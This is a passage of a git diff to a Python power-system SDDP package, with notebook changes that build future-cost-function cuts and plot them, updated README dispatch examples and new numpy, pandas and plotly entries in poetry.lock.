.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]]},\"colorway\":[\"#636efa\",\"#EF553B\",\"#00cc96\",\"#ab63fa\",\"#FFA15A\",\"#19d3f3\",\"#FF6692\",\"#B6E880\",\"#FF97FF\",\"#FECB52\"],\"font\":{\"color\":\"#2a3f5f\"},\"geo\":{\"bgcolor\":\"white\",\"lakecolor\":\"white\",\"landcolor\":\"#E5ECF6\",\"showlakes\":true,\"showland\":true,\"subunitcolor\":\"white\"},\"hoverlabel\":{\"align\":\"left\"},\"hovermode\":\"closest\",\"mapbox\":{\"style\":\"light\"},\"paper_bgcolor\":\"white\",\"plot_bgcolor\":\"#E5ECF6\",\"polar\":{\"angularaxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"},\"bgcolor\":\"#E5ECF6\",\"radialaxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"}},\"scene\":{\"xaxis\":{\"backgroundcolor\":\"#E5ECF6\",\"gridcolor\":\"white\",\"gridwidth\":2,\"linecolor\":\"white\",\"showbackground\":true,\"ticks\":\"\",\"zerolinecolor\":\"white\"},\"yaxis\":{\"backgroundcolor\":\"#E5ECF6\",\"gridcolor\":\"white\",\"gridwidth\":2,\"linecolor\":\"white\",\"showbackground\":true,\"ticks\":\"\",\"zerolinecolor\":\"white\"},\"zaxis\":{\"backgroundcolor\":\"#E5ECF6\",\"gridcolor\":\"white\",\"gridwidth\":2,\"linecolor\":\"white\",\"showb
ackground\":true,\"ticks\":\"\",\"zerolinecolor\":\"white\"}},\"shapedefaults\":{\"line\":{\"color\":\"#2a3f5f\"}},\"ternary\":{\"aaxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"},\"baxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"},\"bgcolor\":\"#E5ECF6\",\"caxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"}},\"title\":{\"x\":0.05},\"xaxis\":{\"automargin\":true,\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\",\"title\":{\"standoff\":15},\"zerolinecolor\":\"white\",\"zerolinewidth\":2},\"yaxis\":{\"automargin\":true,\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\",\"title\":{\"standoff\":15},\"zerolinecolor\":\"white\",\"zerolinewidth\":2}}},\"title\":{\"text\":\"Future Cost Function\"},\"xaxis\":{\"anchor\":\"y\",\"domain\":[0.0,1.0],\"title\":{\"text\":\"Final Volume [hm3]\"}},\"xaxis2\":{\"anchor\":\"y2\",\"domain\":[0.0,1.0],\"title\":{\"text\":\"Final Volume [hm3]\"}},\"xaxis3\":{\"anchor\":\"y3\",\"domain\":[0.0,1.0],\"title\":{\"text\":\"Final Volume [hm3]\"}},\"yaxis\":{\"anchor\":\"x\",\"domain\":[0.7333333333333333,1.0],\"title\":{\"text\":\"$/MW\"}},\"yaxis2\":{\"anchor\":\"x2\",\"domain\":[0.36666666666666664,0.6333333333333333],\"title\":{\"text\":\"$/MW\"}},\"yaxis3\":{\"anchor\":\"x3\",\"domain\":[0.0,0.26666666666666666],\"title\":{\"text\":\"$/MW\"}}}, {\"responsive\": true} ).then(function(){\n",
+ " \n",
+ "var gd = document.getElementById('5fc77ee3-3b5c-46f4-8eb6-e0d83b577b25');\n",
+ "var x = new MutationObserver(function (mutations, observer) {{\n",
+ " var display = window.getComputedStyle(gd).display;\n",
+ " if (!display || display === 'none') {{\n",
+ " console.log([gd, 'removed!']);\n",
+ " Plotly.purge(gd);\n",
+ " observer.disconnect();\n",
+ " }}\n",
+ "}});\n",
+ "\n",
+ "// Listen for the removal of the full notebook cells\n",
+ "var notebookContainer = gd.closest('#notebook-container');\n",
+ "if (notebookContainer) {{\n",
+ " x.observe(notebookContainer, {childList: true});\n",
+ "}}\n",
+ "\n",
+ "// Listen for the clearing of the current output cell\n",
+ "var outputEl = gd.closest('.output');\n",
+ "if (outputEl) {{\n",
+ " x.observe(outputEl, {childList: true});\n",
+ "}}\n",
+ "\n",
+ " }) }; }); </script> </div>"
+ ]
+ },
+ "metadata": {},
+ "output_type": "display_data"
}
],
"source": [
- "import powersddp\n",
+ "from itertools import product\n",
+ "import numpy as np\n",
+ "\n",
+ "n_hgu = len(TestSystem.data['hydro-units'])\n",
+ "n_tgu = len(TestSystem.data['thermal-units'])\n",
+ "\n",
+ "step = 100/(TestSystem.data['discretizations']-1)\n",
+ "discretizations = list(product(np.arange(0,100+step,step), repeat=n_hgu))\n",
"\n",
- "system = powersddp.PowerSystem(path='system.yml')\n",
+ "cuts = []\n",
+ "operation = []\n",
+ "for stage in range(TestSystem.data['stages'],0,-1):\n",
+ " for discretization in discretizations:\n",
+ " \n",
+ " v_i = []\n",
+ " # For Every Hydro Unit\n",
+ " for i, hgu in enumerate(TestSystem.data['hydro-units']):\n",
+ " v_i.append(hgu['v_min'] + (hgu['v_max']-hgu['v_min'])*discretization[i]/100)\n",
+ " \n",
+ " # For Every Scenario\n",
+ " average = 0.\n",
+ " avg_water_marginal_cost = [0 for _ in TestSystem.data[\"hydro-units\"]]\n",
+ " for scenario in range(TestSystem.data['scenarios']):\n",
+ " inflow = []\n",
+ " for i, hgu in enumerate(TestSystem.data['hydro-units']):\n",
+ " inflow.append(hgu['inflow_scenarios'][stage-1][scenario])\n",
+ " \n",
+ " result = dispatch(TestSystem, v_i, inflow, cuts, stage+1)\n",
+ " average += result[\"total_cost\"]\n",
+ " for i, hgu in enumerate(result[\"hydro_units\"]):\n",
+ " avg_water_marginal_cost[i] += hgu[\"water_marginal_cost\"]\n",
"\n",
- "print(\"System Load: {}\\n\"\n",
- " \"Number of HGUs: {}\\n\"\n",
- " \"Number of TGUs: {}\".format(system.data['load'],\n",
- " len(system.data['hydro-units']),\n",
- " len(system.data['thermal-units'])))"
+ " # Calculating the average of the scenarios\n",
+ " average = average/TestSystem.data['scenarios']\n",
+ " coef_b = average\n",
+ " for i, hgu in enumerate(result[\"hydro_units\"]):\n",
+ " # ! Invert the coeficient because of the minimization problem inverts the signal\n",
+ " avg_water_marginal_cost[i] = - avg_water_marginal_cost[i]/TestSystem.data['scenarios']\n",
+ " coef_b -= v_i[i]*avg_water_marginal_cost[i]\n",
+ " \n",
+ " cuts.append({\"stage\": stage, \"coef_b\": coef_b, \"coefs\": avg_water_marginal_cost})\n",
+ " operation.append({'stage': stage, 'discretization': discretization[i], 'v_i': v_i[0], 'average_cost': round(average,2)})\n",
+ "operation_df = pd.DataFrame(operation)\n",
+ "\n",
+ "if n_hgu == 1:\n",
+ " plot_future_cost_function(operation=operation_df)"
]
},
{
"cell_type": "code",
- "execution_count": 1,
- "id": "07837a84-da91-47bf-a749-d4292fde6d57",
+ "execution_count": 13,
+ "id": "87285cd1-3bb7-4c72-bb43-4f2baf6e4077",
"metadata": {},
"outputs": [
{
- "name": "stdout",
- "output_type": "stream",
- "text": [
- "System Load: [50, 50, 50]\n",
- "Number of HGUs: 1\n",
- "Number of TGUs: 2\n"
- ]
+ "data": {
+ "text/html": [
+ "<div>\n",
+ "<style scoped>\n",
+ " .dataframe tbody tr th:only-of-type {\n",
+ " vertical-align: middle;\n",
+ " }\n",
+ "\n",
+ " .dataframe tbody tr th {\n",
+ " vertical-align: top;\n",
+ " }\n",
+ "\n",
+ " .dataframe thead th {\n",
+ " text-align: right;\n",
+ " }\n",
+ "</style>\n",
+ "<table border=\"1\" class=\"dataframe\">\n",
+ " <thead>\n",
+ " <tr style=\"text-align: right;\">\n",
+ " <th></th>\n",
+ " <th>stage</th>\n",
+ " <th>discretization</th>\n",
+ " <th>v_i</th>\n",
+ " <th>average_cost</th>\n",
+ " </tr>\n",
+ " </thead>\n",
+ " <tbody>\n",
+ " <tr>\n",
+ " <th>0</th>\n",
+ " <td>3</td>\n",
+ " <td>0.0</td>\n",
+ " <td>20.0</td>\n",
+ " <td>6725.00</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>1</th>\n",
+ " <td>3</td>\n",
+ " <td>50.0</td>\n",
+ " <td>60.0</td>\n",
+ " <td>7.75</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>2</th>\n",
+ " <td>3</td>\n",
+ " <td>100.0</td>\n",
+ " <td>100.0</td>\n",
+ " <td>-0.00</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>3</th>\n",
+ " <td>2</td>\n",
+ " <td>0.0</td>\n",
+ " <td>20.0</td>\n",
+ " <td>11787.50</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>4</th>\n",
+ " <td>2</td>\n",
+ " <td>50.0</td>\n",
+ " <td>60.0</td>\n",
+ " <td>226.93</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>5</th>\n",
+ " <td>2</td>\n",
+ " <td>100.0</td>\n",
+ " <td>100.0</td>\n",
+ " <td>0.62</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>6</th>\n",
+ " <td>1</td>\n",
+ " <td>0.0</td>\n",
+ " <td>20.0</td>\n",
+ " <td>15425.00</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>7</th>\n",
+ " <td>1</td>\n",
+ " <td>50.0</td>\n",
+ " <td>60.0</td>\n",
+ " <td>576.31</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>8</th>\n",
+ " <td>1</td>\n",
+ " <td>100.0</td>\n",
+ " <td>100.0</td>\n",
+ " <td>161.68</td>\n",
+ " </tr>\n",
+ " </tbody>\n",
+ "</table>\n",
+ "</div>"
+ ],
+ "text/plain": [
+ " stage discretization v_i average_cost\n",
+ "0 3 0.0 20.0 6725.00\n",
+ "1 3 50.0 60.0 7.75\n",
+ "2 3 100.0 100.0 -0.00\n",
+ "3 2 0.0 20.0 11787.50\n",
+ "4 2 50.0 60.0 226.93\n",
+ "5 2 100.0 100.0 0.62\n",
+ "6 1 0.0 20.0 15425.00\n",
+ "7 1 50.0 60.0 576.31\n",
+ "8 1 100.0 100.0 161.68"
+ ]
+ },
+ "execution_count": 13,
+ "metadata": {},
+ "output_type": "execute_result"
}
],
"source": [
- "import powersddp\n",
- "\n",
- "payload = {'load': [50, 50, 50],\n",
- " 'discretizations': 3,\n",
- " 'stages': 3,\n",
- " 'scenarios': 2,\n",
- " 'outage_cost': 500,\n",
- " 'hydro-units': [{'name': 'HU1',\n",
- " 'v_max': 100,\n",
- " 'v_min': 20,\n",
- " 'prod': 0.95,\n",
- " 'flow_max': 60,\n",
- " 'inflow_scenarios': [[23, 16],\n",
- " [19, 14],\n",
- " [15, 11]]}],\n",
- " 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},\n",
- " {'name': 'GT2', 'capacity': 10, 'cost': 25}]}\n",
- "\n",
- "system = powersddp.PowerSystem(data=payload)\n",
- "\n",
- "print(\"System Load: {}\\n\"\n",
- " \"Number of HGUs: {}\\n\"\n",
- " \"Number of TGUs: {}\".format(system.data['load'],\n",
- " len(system.data['hydro-units']),\n",
- " len(system.data['thermal-units'])))"
+ "operation_df"
]
},
{
- "cell_type": "code",
- "execution_count": null,
- "id": "db680eea-a46e-4f24-a739-aae4117bb19e",
+ "cell_type": "markdown",
+ "id": "613592a2-e7e0-4b0a-81b9-a5d0126dde67",
"metadata": {},
- "outputs": [],
- "source": []
+ "source": [
+ "## Considering the Future Cost Function\n",
+ "\n",
+ "### Modelling the cost of water\n",
+ "\n",
+ "Now, let's consider the Future Cost Function to back propagate the solutions. By back propagating we assume that the future cost function of the \"stage ahead\" is used as input for the previous stage solution.\n",
+ "\n",
+    "Assuming that any Future Cost Function is approximated by a series of straight-line discretizations, any given point can be identified by a straight line, mathematically represented by:\n",
+ "\n",
+ "$$\n",
+ "\\begin{equation}\n",
+ " \\begin{aligned}\n",
+ " \\alpha = a \\cdot v_f + b\n",
+ " \\end{aligned}\n",
+ "\\end{equation}\n",
+ "$$\n",
+ "\n",
+    "Where $\\alpha$ is the cost at a given final volume. We shall find the coefficients $a$ and $b$:\n",
+    "\n",
+    "- $a$: the marginal cost of the water, which comes from the solution of the minimization problem.\n",
+ "\n",
+    "If we assume $\\alpha = 75$ and $v_f = 60$, which means a cost of $\\$75.00$ at a Final Volume of $60 hm^3$, that gives us:\n",
+ "\n",
+ "$$\n",
+ "\\begin{equation}\n",
+ " \\begin{aligned}\n",
+ " b = \\alpha - a \\cdot v_f\n",
+ " \\end{aligned}\n",
+ "\\end{equation}\n",
+ "$$\n",
+ "\n",
+    "> Naturally, this process is repeated for every discretization used in the problem.\n",
+    "\n",
+    "> $a$ is given by the average of the water marginal cost over every scenario considered.\n",
+    "\n",
+    "If we evaluate multiple Hydro Units, naturally:\n",
+ "\n",
+ "$$\n",
+ "\\begin{equation}\n",
+ " \\begin{aligned}\n",
+    "    \\alpha = b + \\sum_{i=1}^{n} a_i \\cdot v_{f_i}\n",
+ " \\end{aligned}\n",
+ "\\end{equation}\n",
+ "$$\n",
+ "\n",
+    "Where $n$ is the number of Hydro Units.\n",
+ "\n",
+ "### Considering the cost function in the back propagation\n",
+ "\n",
+    "In the previous stage (back propagating from the end to the beginning) we have the objective function:\n",
+ "\n",
+ "$$\n",
+ "\\begin{equation}\n",
+ " \\begin{aligned}\n",
+ " \\min \\quad & C_1\\cdot g_{t_1} + C_2\\cdot g_{t_2} + C_{def}\\cdot def + 0.01\\cdot v_v + \\alpha\\\\\n",
+ " \\textrm{s.t.} \\quad & \\\\\n",
+ " \\textrm{hydro balance} \\quad & v_f(i) = v_i(i) + afl(i) - v_t(i) - v_v(i) \\\\\n",
+ " \\textrm{load supplying} \\quad & \\rho\\cdot v_t(i) + g_{t_1} + g_{t_2} + def = \\textrm{load}\\\\\n",
+ " \\textrm{considering the forward state}\\quad & \\\\\n",
+    "    \\textrm{for every scenario } s \\quad & \\alpha \\geq a^{s} \\cdot v_f(i) + b^{s}\\\\\n",
+ " \\textrm{constraints} \\quad & \\\\\n",
+ " & v_{f_{min}}\\leq v_f(i) \\leq v_{f_{max}}\\\\\n",
+ " & v_{t_{min}}\\leq v_t(i) \\leq v_{t_{max}}\\\\\n",
+ " & v_{v_{min}}\\leq v_v(i) \\leq v_{v_{max}}\\\\\n",
+ " & g_{t_{min}}\\leq g_t^\\ast \\leq g_{t_{max}}\\\\\n",
+ " ^\\ast \\textrm{for each TGU}& \n",
+ " \\end{aligned}\n",
+ "\\end{equation}\n",
+ "$$"
+ ]
}
],
"metadata": {
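The cut construction carried out in the notebook cells above (average the scenario costs, invert and average the water marginal costs, then solve $b = \alpha - \sum_i a_i \cdot v_i$) can be sketched outside the solver. The `build_cut` helper and its input values below are illustrative, not part of the package:

```python
def build_cut(stage, v_i, scenario_results, n_scenarios):
    """Build one cut of the future cost function from per-scenario results.

    Each result is expected to carry 'total_cost' and, per hydro unit,
    a 'water_marginal_cost', mirroring the dispatch output above.
    """
    average = sum(r["total_cost"] for r in scenario_results) / n_scenarios
    coefs = [0.0] * len(v_i)
    for r in scenario_results:
        for i, hgu in enumerate(r["hydro_units"]):
            coefs[i] += hgu["water_marginal_cost"]
    coef_b = average
    for i in range(len(v_i)):
        # Invert the sign: the minimization problem flips the multiplier
        coefs[i] = -coefs[i] / n_scenarios
        coef_b -= v_i[i] * coefs[i]
    return {"stage": stage, "coef_b": coef_b, "coefs": coefs}


# Two illustrative scenario solutions for one hydro unit at v_i = 60 hm3
results = [
    {"total_cost": 100.0, "hydro_units": [{"water_marginal_cost": -2.0}]},
    {"total_cost": 50.0, "hydro_units": [{"water_marginal_cost": -1.0}]},
]
cut = build_cut(3, [60.0], results, 2)
# average cost alpha = 75, a = 1.5, so b = 75 - 1.5 * 60 = -15
```

With these made-up numbers the example reproduces the markdown case of $\alpha = 75$ at $v_f = 60$.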
diff --git a/README.md b/README.md
index 9294885..e375b86 100644
--- a/README.md
+++ b/README.md
@@ -27,9 +27,9 @@ There are two ways of initializing a `Power System`. Either by providing a `.yml
### Initializing a `PowerSystem`
```Python
-import powersddp
+import powersddp as psddp
-system = powersddp.PowerSystem(path='system.yml')
+system = psddp.PowerSystem(path='system.yml')
print("System Load: {}\n"
"Number of HGUs: {}\n"
@@ -39,25 +39,23 @@ print("System Load: {}\n"
```
```Python
-import powersddp
-
-payload = {'load': [50, 50, 50],
- 'discretizations': 3,
- 'stages': 3,
- 'scenarios': 2,
- 'outage_cost': 500,
- 'hydro-units': [{'name': 'HU1',
- 'v_max': 100,
- 'v_min': 20,
- 'prod': 0.95,
- 'flow_max': 60,
- 'inflow_scenarios': [[23, 16],
- [19, 14],
- [15, 11]]}],
- 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},
- {'name': 'GT2', 'capacity': 10, 'cost': 25}]}
-
-system = powersddp.PowerSystem(data=payload)
+import powersddp as psddp
+
+data = {'load': [50, 50, 50],
+ 'discretizations': 3,
+ 'stages': 3,
+ 'scenarios': 2,
+ 'outage_cost': 500,
+ 'hydro-units': [{'name': 'HU1',
+ 'v_max': 100,
+ 'v_min': 20,
+ 'prod': 0.95,
+ 'flow_max': 60,
+ 'inflow_scenarios': [[23, 16], [19, 14], [15, 11]]}],
+ 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},
+ {'name': 'GT2', 'capacity': 10, 'cost': 25}]}
+
+PowerSystem = psddp.PowerSystem(data=data)
print("System Load: {}\n"
"Number of HGUs: {}\n"
@@ -66,4 +64,37 @@ print("System Load: {}\n"
len(system.data['thermal-units'])))
```
+### Dispatching a `PowerSystem`
+
+#### **dispatch()** accepts the following arguments:
+
+- `verbose : bool, optional defaults to False`
+ - Displays the PDDE solution for every stage of the execution. Use with care, solutions of complex systems with too many stages and scenarios might overflow the console.
+
+- `plot : bool, optional, defaults to False`
+ - Displays a sequence of plots showing the future cost function for every stage of the execution.
+
+
+```Python
+import powersddp as psddp
+
+data = {'load': [50, 50, 50],
+ 'discretizations': 3,
+ 'stages': 3,
+ 'scenarios': 2,
+ 'outage_cost': 500,
+ 'hydro-units': [{'name': 'HU1',
+ 'v_max': 100,
+ 'v_min': 20,
+ 'prod': 0.95,
+ 'flow_max': 60,
+ 'inflow_scenarios': [[23, 16], [19, 14], [15, 11]]}],
+ 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},
+ {'name': 'GT2', 'capacity': 10, 'cost': 25}]}
+
+PowerSystem = psddp.PowerSystem(data=data)
+operation = PowerSystem.dispatch()
+
+print(operation)
+```
<!-- <img src="https://render.githubusercontent.com/render/math?math=e^{i \pi} = -1"> -->
diff --git a/poetry.lock b/poetry.lock
index 7944ec3..a74fecf 100644
--- a/poetry.lock
+++ b/poetry.lock
@@ -683,6 +683,14 @@ docs = ["sphinx", "nbsphinx", "sphinxcontrib-github-alt", "sphinx-rtd-theme", "m
json-logging = ["json-logging"]
test = ["pytest", "coverage", "requests", "nbval", "selenium", "pytest-cov", "requests-unixsocket"]
+[[package]]
+name = "numpy"
+version = "1.21.1"
+description = "NumPy is the fundamental package for array computing with Python."
+category = "main"
+optional = false
+python-versions = ">=3.7"
+
[[package]]
name = "packaging"
version = "21.0"
@@ -694,6 +702,22 @@ python-versions = ">=3.6"
[package.dependencies]
pyparsing = ">=2.0.2"
+[[package]]
+name = "pandas"
+version = "1.3.2"
+description = "Powerful data structures for data analysis, time series, and statistics"
+category = "main"
+optional = false
+python-versions = ">=3.7.1"
+
+[package.dependencies]
+numpy = ">=1.17.3"
+python-dateutil = ">=2.7.3"
+pytz = ">=2017.3"
+
+[package.extras]
+test = ["hypothesis (>=3.58)", "pytest (>=6.0)", "pytest-xdist"]
+
[[package]]
name = "pandocfilters"
version = "1.4.3"
@@ -741,6 +765,18 @@ category = "dev"
optional = false
python-versions = "*"
+[[package]]
+name = "plotly"
+version = "5.2.1"
+description = "An open-source, interactive data visualization library for Python"
+category = "main"
+optional = false
+python-versions = ">=3.6"
+
+[package.dependencies]
+six = "*"
+tenacity = ">=6.2.0"
+
[[package]]
name = "pluggy"
version = "0.13.1"
@@ -863,7 +899,7 @@ testing = ["argcomplete", "hypothesis (>=3.56)", "mock", "nose", "requests", "xm
name = "python-dateutil"
version = "2.8.2"
description = "Extensions to the standard Python datetime module"
-category = "dev"
+category = "main"
optional = false
python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,>=2.7"
@@ -874,7 +910,7 @@ six = ">=1.5"
name = "pytz"
version = "2021.1"
description = "World timezone definitions, modern and historical"
-category = "dev"
+category = "main"
optional = false
python-versions = "*"
@@ -969,7 +1005,7 @@ win32 = ["pywin32"]
name = "six"
version = "1.16.0"
description = "Python 2 and 3 compatibility utilities"
-category = "dev"
+category = "main"
optional = false
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*"
@@ -981,6 +1017,17 @@ category = "dev"
optional = false
python-versions = ">=3.5"
+[[package]]
+name = "tenacity"
+version = "8.0.1"
+description = "Retry code until it succeeds"
+category = "main"
+optional = false
+python-versions = ">=3.6"
+
+[package.extras]
+doc = ["reno", "sphinx", "tornado (>=4.5)"]
+
[[package]]
name = "terminado"
version = "0.11.0"
@@ -1114,7 +1161,7 @@ python-versions = "*"
[metadata]
lock-version = "1.1"
python-versions = "^3.8"
-content-hash = "a80ab2d038ebd23b2a35fddb2e703975351608f10eedf2519677c49d97feb518"
+content-hash = "cae2aa10dea3acba3f146c7781ed78b2fb59bceac409a73911ca7d08dbffb158"
[metadata.files]
anyio = [
@@ -1531,10 +1578,61 @@ notebook = [
{file = "notebook-6.4.3-py3-none-any.whl", hash = "sha256:b50eafa8208d5db966efd1caa4076b4dfc51815e02a805b32ecd717e9e6cc071"},
{file = "notebook-6.4.3.tar.gz", hash = "sha256:e6b6dfed36b00cf950f63c0d42e947c101d4258aec21624de62b9e0c11ed5c0d"},
]
+numpy = [
+ {file = "numpy-1.21.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:38e8648f9449a549a7dfe8d8755a5979b45b3538520d1e735637ef28e8c2dc50"},
+ {file = "numpy-1.21.1-cp37-cp37m-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:fd7d7409fa643a91d0a05c7554dd68aa9c9bb16e186f6ccfe40d6e003156e33a"},
+ {file = "numpy-1.21.1-cp37-cp37m-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:a75b4498b1e93d8b700282dc8e655b8bd559c0904b3910b144646dbbbc03e062"},
+ {file = "numpy-1.21.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1412aa0aec3e00bc23fbb8664d76552b4efde98fb71f60737c83efbac24112f1"},
+ {file = "numpy-1.21.1-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:e46ceaff65609b5399163de5893d8f2a82d3c77d5e56d976c8b5fb01faa6b671"},
+ {file = "numpy-1.21.1-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:c6a2324085dd52f96498419ba95b5777e40b6bcbc20088fddb9e8cbb58885e8e"},
+ {file = "numpy-1.21.1-cp37-cp37m-win32.whl", hash = "sha256:73101b2a1fef16602696d133db402a7e7586654682244344b8329cdcbbb82172"},
+ {file = "numpy-1.21.1-cp37-cp37m-win_amd64.whl", hash = "sha256:7a708a79c9a9d26904d1cca8d383bf869edf6f8e7650d85dbc77b041e8c5a0f8"},
+ {file = "numpy-1.21.1-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:95b995d0c413f5d0428b3f880e8fe1660ff9396dcd1f9eedbc311f37b5652e16"},
+ {file = "numpy-1.21.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:635e6bd31c9fb3d475c8f44a089569070d10a9ef18ed13738b03049280281267"},
+ {file = "numpy-1.21.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:4a3d5fb89bfe21be2ef47c0614b9c9c707b7362386c9a3ff1feae63e0267ccb6"},
+ {file = "numpy-1.21.1-cp38-cp38-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:8a326af80e86d0e9ce92bcc1e65c8ff88297de4fa14ee936cb2293d414c9ec63"},
+ {file = "numpy-1.21.1-cp38-cp38-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:791492091744b0fe390a6ce85cc1bf5149968ac7d5f0477288f78c89b385d9af"},
+ {file = "numpy-1.21.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0318c465786c1f63ac05d7c4dbcecd4d2d7e13f0959b01b534ea1e92202235c5"},
+ {file = "numpy-1.21.1-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:9a513bd9c1551894ee3d31369f9b07460ef223694098cf27d399513415855b68"},
+ {file = "numpy-1.21.1-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:91c6f5fc58df1e0a3cc0c3a717bb3308ff850abdaa6d2d802573ee2b11f674a8"},
+ {file = "numpy-1.21.1-cp38-cp38-win32.whl", hash = "sha256:978010b68e17150db8765355d1ccdd450f9fc916824e8c4e35ee620590e234cd"},
+ {file = "numpy-1.21.1-cp38-cp38-win_amd64.whl", hash = "sha256:9749a40a5b22333467f02fe11edc98f022133ee1bfa8ab99bda5e5437b831214"},
+ {file = "numpy-1.21.1-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:d7a4aeac3b94af92a9373d6e77b37691b86411f9745190d2c351f410ab3a791f"},
+ {file = "numpy-1.21.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:d9e7912a56108aba9b31df688a4c4f5cb0d9d3787386b87d504762b6754fbb1b"},
+ {file = "numpy-1.21.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:25b40b98ebdd272bc3020935427a4530b7d60dfbe1ab9381a39147834e985eac"},
+ {file = "numpy-1.21.1-cp39-cp39-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:8a92c5aea763d14ba9d6475803fc7904bda7decc2a0a68153f587ad82941fec1"},
+ {file = "numpy-1.21.1-cp39-cp39-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:05a0f648eb28bae4bcb204e6fd14603de2908de982e761a2fc78efe0f19e96e1"},
+ {file = "numpy-1.21.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f01f28075a92eede918b965e86e8f0ba7b7797a95aa8d35e1cc8821f5fc3ad6a"},
+ {file = "numpy-1.21.1-cp39-cp39-win32.whl", hash = "sha256:88c0b89ad1cc24a5efbb99ff9ab5db0f9a86e9cc50240177a571fbe9c2860ac2"},
+ {file = "numpy-1.21.1-cp39-cp39-win_amd64.whl", hash = "sha256:01721eefe70544d548425a07c80be8377096a54118070b8a62476866d5208e33"},
+ {file = "numpy-1.21.1-pp37-pypy37_pp73-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:2d4d1de6e6fb3d28781c73fbde702ac97f03d79e4ffd6598b880b2d95d62ead4"},
+ {file = "numpy-1.21.1.zip", hash = "sha256:dff4af63638afcc57a3dfb9e4b26d434a7a602d225b42d746ea7fe2edf1342fd"},
+]
packaging = [
{file = "packaging-21.0-py3-none-any.whl", hash = "sha256:c86254f9220d55e31cc94d69bade760f0847da8000def4dfe1c6b872fd14ff14"},
{file = "packaging-21.0.tar.gz", hash = "sha256:7dc96269f53a4ccec5c0670940a4281106dd0bb343f47b7471f779df49c2fbe7"},
]
+pandas = [
+ {file = "pandas-1.3.2-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:ba7ceb8abc6dbdb1e34612d1173d61e4941f1a1eb7e6f703b2633134ae6a6c89"},
+ {file = "pandas-1.3.2-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fcb71b1935249de80e3a808227189eee381d4d74a31760ced2df21eedc92a8e3"},
+ {file = "pandas-1.3.2-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fa54dc1d3e5d004a09ab0b1751473698011ddf03e14f1f59b84ad9a6ac630975"},
+ {file = "pandas-1.3.2-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:34ced9ce5d5b17b556486da7256961b55b471d64a8990b56e67a84ebeb259416"},
+ {file = "pandas-1.3.2-cp37-cp37m-win32.whl", hash = "sha256:a56246de744baf646d1f3e050c4653d632bc9cd2e0605f41051fea59980e880a"},
+ {file = "pandas-1.3.2-cp37-cp37m-win_amd64.whl", hash = "sha256:53b17e4debba26b7446b1e4795c19f94f0c715e288e08145e44bdd2865e819b3"},
+ {file = "pandas-1.3.2-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:f07a9745ca075ae73a5ce116f5e58f691c0dc9de0bff163527858459df5c176f"},
+ {file = "pandas-1.3.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c9e8e0ce5284ebebe110efd652c164ed6eab77f5de4c3533abc756302ee77765"},
+ {file = "pandas-1.3.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:59a78d7066d1c921a77e3306aa0ebf6e55396c097d5dfcc4df8defe3dcecb735"},
+ {file = "pandas-1.3.2-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:132def05e73d292c949b02e7ef873debb77acc44a8b119d215921046f0c3a91d"},
